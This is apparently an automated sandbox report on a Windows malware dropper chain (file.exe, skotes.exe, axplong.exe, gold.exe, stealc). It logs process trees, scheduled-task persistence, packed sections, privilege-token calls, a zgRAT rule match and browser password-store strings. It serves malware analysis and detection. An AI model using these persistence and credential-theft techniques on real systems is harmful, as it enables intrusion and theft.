                                    Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_871ae693-8
                                    PE file contains section with special chars
                                    Source: file.exeStatic PE information: section name:
                                    Source: file.exeStatic PE information: section name: .idata
                                    Source: file.exeStatic PE information: section name:
                                    Source: skotes.exe.6.drStatic PE information: section name:
                                    Source: skotes.exe.6.drStatic PE information: section name: .idata
                                    Source: skotes.exe.6.drStatic PE information: section name:
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name:
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: .rsrc
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name: .idata
                                    Source: 3ec4738210.exe.11.drStatic PE information: section name:
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name:
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: .rsrc
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name: .idata
                                    Source: b74664dd7e.exe.11.drStatic PE information: section name:
                                    Source: random[1].exe0.11.drStatic PE information: section name:
                                    Source: random[1].exe0.11.drStatic PE information: section name: .idata
                                    Source: random[1].exe0.11.drStatic PE information: section name:
                                    Source: random[1].exe1.11.drStatic PE information: section name:
                                    Source: random[1].exe1.11.drStatic PE information: section name: .rsrc
                                    Source: random[1].exe1.11.drStatic PE information: section name: .idata
                                    Source: random[1].exe1.11.drStatic PE information: section name:
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name:
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name: .idata
                                    Source: 610cd559ac.exe.11.drStatic PE information: section name:
                                    Source: axplong.exe.23.drStatic PE information: section name:
                                    Source: axplong.exe.23.drStatic PE information: section name: .idata
                                    Source: axplong.exe.23.drStatic PE information: section name:
                                    Source: random[2].exe.27.drStatic PE information: section name:
                                    Source: random[2].exe.27.drStatic PE information: section name: .rsrc
                                    Source: random[2].exe.27.drStatic PE information: section name: .idata
                                    Source: random[2].exe.27.drStatic PE information: section name:
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name:
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: .rsrc
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name: .idata
                                    Source: 4d72d15151.exe.27.drStatic PE information: section name:
                                    PE file has a writeable .text section
                                    Source: stealc_default2[1].exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    Source: stealc_default2.exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5D5EB: CreateFileW,DeviceIoControl,CloseHandle,17_2_00E5D5EB
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,17_2_00E51201
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00E5E8F6
                                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile created: C:\Windows\Tasks\axplong.job
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DBE53011_2_00DBE530
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF78BB11_2_00DF78BB
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF704911_2_00DF7049
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF886011_2_00DF8860
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DB4DE011_2_00DB4DE0
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF31A811_2_00DF31A8
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF2D1011_2_00DF2D10
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DF779B11_2_00DF779B
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DE7F3611_2_00DE7F36
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 11_2_00DB4B3011_2_00DB4B30
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DFBF4017_2_00DFBF40
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6204617_2_00E62046
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF806017_2_00DF8060
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5829817_2_00E58298
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E2E4FF17_2_00E2E4FF
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E2676B17_2_00E2676B
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E8487317_2_00E84873
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DFCAF017_2_00DFCAF0
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E1CAA017_2_00E1CAA0
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E0CC3917_2_00E0CC39
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E26DD917_2_00E26DD9
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF91C017_2_00DF91C0
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E0B11917_2_00E0B119
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E1139417_2_00E11394
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E1170617_2_00E11706
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E1781B17_2_00E1781B
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E119B017_2_00E119B0
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E0997D17_2_00E0997D
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF792017_2_00DF7920
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E17A4A17_2_00E17A4A
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E17CA717_2_00E17CA7
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E11C7717_2_00E11C77
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E29EEE17_2_00E29EEE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E7BE4417_2_00E7BE44
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E11F3217_2_00E11F32
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe 1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe 17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: String function: 00DF9CB3 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: String function: 00E0F9F2 appears 40 times
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: String function: 00E10A30 appears 46 times
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
                                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                    Source: crypted[1].exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: crypted.exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.998073484332425
                                    Source: file.exeStatic PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
                                    Source: skotes.exe.6.drStatic PE information: Section: ZLIB complexity 0.998073484332425
                                    Source: skotes.exe.6.drStatic PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
                                    Source: 3ec4738210.exe.11.drStatic PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
                                    Source: b74664dd7e.exe.11.drStatic PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
                                    Source: random[1].exe0.11.drStatic PE information: Section: ZLIB complexity 0.9973124574250681
                                    Source: random[1].exe0.11.drStatic PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
                                    Source: random[1].exe1.11.drStatic PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
                                    Source: 610cd559ac.exe.11.drStatic PE information: Section: ZLIB complexity 0.9973124574250681
                                    Source: 610cd559ac.exe.11.drStatic PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
                                    Source: axplong.exe.23.drStatic PE information: Section: ZLIB complexity 0.9973124574250681
                                    Source: axplong.exe.23.drStatic PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
                                    Source: random[2].exe.27.drStatic PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
                                    Source: 4d72d15151.exe.27.drStatic PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
                                    Source: skotes.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@39/57@1/12
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E637B5 GetLastError,FormatMessageW,17_2_00E637B5
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E510BF AdjustTokenPrivileges,CloseHandle,17_2_00E510BF
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00E516C3
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,17_2_00E651CD
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,17_2_00E7A67C
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,17_2_00E6648E
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,17_2_00DF42A2
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1964
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7812
                                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\abc3bc1985Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000382E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003854000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003845000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: file.exeReversingLabs: Detection: 47%
                                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: 3ec4738210.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: b74664dd7e.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: 3ec4738210.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe"
                                    Source: unknownProcess created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                    Source: unknownProcess created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 1512
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
